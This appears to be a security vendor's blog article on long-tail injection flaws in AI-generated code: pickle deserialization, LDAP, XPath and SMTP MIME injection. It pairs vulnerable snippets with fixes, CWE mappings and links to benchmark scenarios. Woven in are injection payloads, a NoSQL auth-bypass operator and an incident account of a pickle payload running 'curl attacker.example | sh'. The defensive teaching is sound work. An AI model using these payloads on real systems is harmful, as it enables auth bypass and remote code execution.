INSECURE DESERIALIZATION AND LONG-TAIL INJECTIONS

SQL injection gets all the press. The other injection classes are still alive and well in AI-generated code, and the model frequently picks the unsafe primitive because the safe one is more verbose.

The scenario referenced below runs on gapbench.vibe-eval.com — a public security benchmark we operate.

The injection family beyond SQL

SQL injection has a brand. People know about it. Frameworks default to parameterized queries. Most AI-generated SQL is, accidentally, safe — because Prisma, Drizzle, and the modern ORMs make the safe path the default.

The injection family beyond SQL is less famous and less defaulted-safe. Pickle, LDAP, XPath, MIME, NoSQL, template engines (SSTI). Each has its own gotcha. AI generators reproduce them because the safe pattern requires knowing about the unsafe pattern, and the unsafe pattern is shorter.

I’ll cover four; gapbench has more.

Insecure deserialization

import pickle

@app.route('/restore', methods=['POST'])
def restore():
    data = pickle.loads(request.data)
    return jsonify(restored=str(data))

pickle.loads will execute arbitrary code from a crafted byte string. Tools to generate the payload exist (ysoserial.py for Python, ysoserial for Java). Send the payload, code runs.

The fix: don’t use pickle for untrusted input. Use JSON. If you specifically need pickle for performance reasons, sign the payload (HMAC) and verify before deserializing — and even then, prefer not to.

Same shape applies to:

  • Java ObjectInputStream — use Jackson or similar with explicit type allow-lists.
  • PHP unserialize — avoid for untrusted input; use json_decode.
  • Ruby Marshal.load — avoid; use JSON.
  • .NET BinaryFormatter — Microsoft has explicitly deprecated this for the same reason.

Live: https://gapbench.vibe-eval.com/site/insecure-deser/.

LDAP filter injection

filter = f"(uid={username})"
results = ldap_client.search(base_dn, ldap.SCOPE_SUBTREE, filter)

Username = *)(uid=*. The filter becomes (uid=*)(uid=*)) (with the trailing ) from the format string), which depending on the LDAP server may match all users. With more creative payloads — *)(|(password=*) — the attacker can probe attributes.

Fix: escape LDAP special characters ((, ), *, \, NUL) in user input before interpolating, or use a parameterized API if your LDAP library has one.

Live: https://gapbench.vibe-eval.com/site/ldap-injection/.

XPath tautology

const query = `//users/user[username='${input}' and password='${pass}']`
const result = xmlDoc.evaluate(query, ...)

Username = ' or '1'='1. The query becomes //users/user[username='' or '1'='1' and password=''], which matches the first user. With more creativity, attacker reads arbitrary XML content.

Fix: parameterized XPath via XPathExpression with variable bindings, or escape user input. Don’t concatenate.

Live: https://gapbench.vibe-eval.com/site/xpath-injection/.

SMTP MIME injection

def send_email(to, subject, body):
    msg = f"To: {to}\r\nSubject: {subject}\r\nFrom: noreply@example.com\r\n\r\n{body}"
    smtp.sendmail(...)

To = victim@example.com\r\nBcc: attacker@example.com. The attacker is now BCC’d on every email sent to that address. Or the attacker can inject Subject: Free iPad\r\n\r\nClick here to claim to send their own emails through your service.

Fix: use a proper email library (smtplib.MIMEText, nodemailer, etc.) that handles MIME structure correctly. Validate that user-supplied addresses don’t contain \r or \n.

Live: https://gapbench.vibe-eval.com/site/email-mime-injection/.

Bonus mentions

For completeness, these have their own scenarios:

  • SQL injection at /site/sqli-raw/. Yes, AI still produces raw SQL with string concatenation, especially in code that mixes ORM calls with “just one quick raw query.”
  • NoSQL injection at /site/nosql-injection/. Mongo’s $where and operator-based query injection — { username: { $ne: null } } to bypass auth.
  • Server-Side Template Injection at /site/ssti/. Concatenating user input into a Jinja2/Handlebars/etc. template that the engine evaluates.

The shape is the same across all of them: build a query/template/filter from user input without escaping or parameterization, and the user gets to control the structure. The fix is the same: parameterize.

A specific incident — pickle to RCE

Anonymized. A Python data-science SaaS had a feature where users could “save and share their workspace state.” Workspace state was a complex object graph — pandas DataFrames, scikit-learn models, custom transformer classes. The team’s serialization choice: pickle, because it round-trips arbitrary Python objects and JSON wouldn’t.

The save endpoint pickled the workspace state and stored it in S3. The load endpoint pulled the bytes and unpickled. Both endpoints were authenticated.

The bug was that “shared” workspaces — a feature added later — let one user load another user’s pickle. The receiving user didn’t know whose pickle they were loading. An attacker registered, pickled a workspace state containing __reduce__ magic that runs os.system('curl attacker.example | sh') on unpickle, shared it with target users, and waited for them to click the share link.

Three users clicked. Three RCEs. The malicious pickle ran inside the SaaS’s worker, which had access to the S3 bucket and to a few internal services. The attacker pivoted from worker access to S3-write to the team’s container registry, pushed a malicious image, and waited for the next deploy.

The cleanup was extensive. Disable pickle entirely; migrate workspace serialization to a custom JSON-based format that explicitly lists allowed types. Audit S3 for malicious files. Re-deploy from a known-good registry image. Rotate every credential the worker had touched.

The lesson, and it is the lesson for every variant of insecure deserialization: pickle (and Java ObjectInputStream, and PHP unserialize, and Ruby Marshal) is RCE-by-design when used on untrusted input. It’s not a “this could be exploited” — it’s a “this is how the format is intended to work.” If you have user input flowing into pickle.loads, you have RCE. The fix is “don’t use pickle for user input.”

What “untrusted” means in this context

Untrusted = anyone who is not the same trust principal as the code reading the data. In practice:

  • Data from a different user, even an authenticated one — untrusted relative to the receiving user
  • Data from your own database — untrusted if the database’s contents are influenced by user actions
  • Data from an external API — untrusted relative to your service
  • Data from cache — only as trusted as whoever can write to the cache
  • Data from a file — only as trusted as the file’s source

The general rule: deserialize untrusted input only with formats that don’t allow code execution. JSON, MessagePack, Protobuf, Avro, CBOR are safe. Pickle, ObjectInputStream, unserialize, Marshal, BinaryFormatter, YAML (with some loaders) are not.

A LDAP injection deep-dive

LDAP injection is less common than SQL injection but more catastrophic when it lands, because LDAP is often the auth backend for the entire org.

# WRONG: f-string interpolation
filter = f"(uid={username})"
# username = "*)(uid=*"
# filter = "(uid=*)(uid=*))"
# Some LDAP servers parse this as the OR of multiple conditions
# WRONG: incomplete escaping
def escape(s):
    return s.replace('(', '\\28').replace(')', '\\29')
# Misses: *, \, NUL byte, backslash itself
# RIGHT: full LDAP escape per RFC 4515
def ldap_escape(s):
    table = str.maketrans({
        '\\': r'\5c',
        '*': r'\2a',
        '(': r'\28',
        ')': r'\29',
        '\x00': r'\00',
    })
    return s.translate(table)

filter = f"(uid={ldap_escape(username)})"
# BETTER: parameterized search if your library supports it
# python-ldap supports filter substitution; ldap3 supports it explicitly

XPath, LDAP, and email MIME — common shape

All three injection classes share a structure: the application builds a query/filter/header from user input via string concatenation, and special characters in the input change the query’s meaning. The defense is identical in shape — escape per the format’s spec, or use a parameterized API.

The bugs persist because:

  1. The “escape function” is rarely in the standard library and is finicky to write correctly.
  2. Parameterized APIs exist but require more setup than string concatenation.
  3. AI codegen reaches for the shorter pattern, which is the unsafe one.

Cross-stack notes

The same general advice (use a safe deserializer; use parameterized queries; sanitize injection inputs) applies. The libraries that make the right pattern easy:

  • Python: defusedxml for XML, defusedjson is unnecessary (JSON is safe), pyyaml with safe_load (not load), pickle should be avoided for untrusted input.
  • Java: Jackson with ObjectMapper().disable(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES) and an explicit type list. Avoid ObjectInputStream.
  • Ruby: JSON.parse is safe. YAML.safe_load exists and should be used instead of YAML.load.
  • PHP: json_decode is safe. unserialize should not see untrusted input.
  • .NET: Newtonsoft.Json is safe. BinaryFormatter is deprecated by Microsoft for security reasons.

How we detect

For each injection family we have a payload set:

  • Deser: probe with format-specific exploit payloads (pickle, Java) and observe whether code execution markers appear server-side.
  • LDAP: probe with *)(uid=*) and similar payloads, observe whether response data widens unexpectedly.
  • XPath: probe with ' or '1'='1 payloads against query endpoints, observe whether responses include unexpected data.
  • MIME: probe with CRLF-in-address payloads, observe whether emails get sent to unexpected destinations.

All runtime. The static scanner story is partial — it can flag the unsafe library calls (pickle.loads, raw f-string LDAP filters, etc.) but can’t confirm exploitability without the request.

CWE / OWASP

  • CWE-502 — Deserialization of Untrusted Data
  • CWE-90 — Improper Neutralization of Special Elements used in an LDAP Query
  • CWE-643 — Improper Neutralization of Data within XPath Expressions
  • CWE-93 — Improper Neutralization of CRLF Sequences (MIME)
  • OWASP Top 10 — A03:2021 Injection, A08:2021 Software and Data Integrity Failures

Reproduce it yourself

COMMON QUESTIONS

01
What is insecure deserialization?
Some serialization formats — Python's pickle, Java's ObjectInputStream, PHP's unserialize, Ruby's Marshal — can encode arbitrary objects with constructors that run code on deserialize. If your app deserializes untrusted input with these formats, an attacker can craft a payload that triggers code execution. JSON and most binary formats (Protobuf, Avro) are safe by design; the dangerous ones are the ones that allow class instantiation from the data.
Q&A
02
What is LDAP filter injection?
If your app builds an LDAP filter from user input — typically for a username lookup — and concatenates the input into the filter string, an attacker can break out of the intended filter. A username of *)(uid=*) can match every user in the directory. The fix is to escape LDAP special characters in user input, or to use a parameterized LDAP query API.
Q&A
03
What is XPath tautology?
Same shape as SQL injection but in XPath. App builds an XPath expression with user input concatenated. Attacker submits 'admin' or '1'='1' style payloads that turn the expression into a tautology, bypassing the filter. Common in apps that store auth or config in XML and query it with XPath.
Q&A
04
What is SMTP MIME injection?
Your app sends emails. The To, Subject, or Reply-To header is built from user input. If the input contains carriage-return-line-feed sequences, the user can inject additional headers — Bcc, additional To, even add MIME boundaries that change the email body. Used to send spam through your service, or to steal email contents by adding a Bcc to the attacker.
Q&A
05
Why do AI generators still produce these?
Because each one's safe pattern is verbose and the unsafe pattern is short. Pickle.loads(data) is one line; the safe equivalent is several. Building an LDAP filter with f-strings is one line; using a parameterized API is more setup. The AI picks the short pattern by default. The bug is invisible until exploited.
Q&A
06
Where can I see this on a real URL?
https://gapbench.vibe-eval.com/site/insecure-deser/, https://gapbench.vibe-eval.com/site/ldap-injection/, https://gapbench.vibe-eval.com/site/xpath-injection/, https://gapbench.vibe-eval.com/site/email-mime-injection/. SQL injection, NoSQL injection, and SSTI also exist as their own scenarios at /site/sqli-raw/, /site/nosql-injection/, /site/ssti/.
Q&A
07
What CWE does this map to?
CWE-502 (Deserialization of Untrusted Data), CWE-90 (LDAP Injection), CWE-643 (XPath Injection), CWE-93 (CRLF Injection for MIME). OWASP A03:2021 (Injection), A08:2021 (Software and Data Integrity Failures).
Q&A

PROBE THE LONG-TAIL INJECTIONS

We send the deserialization, LDAP, XPath, and MIME payloads that catch the unsafe variants.

RUN THE SCAN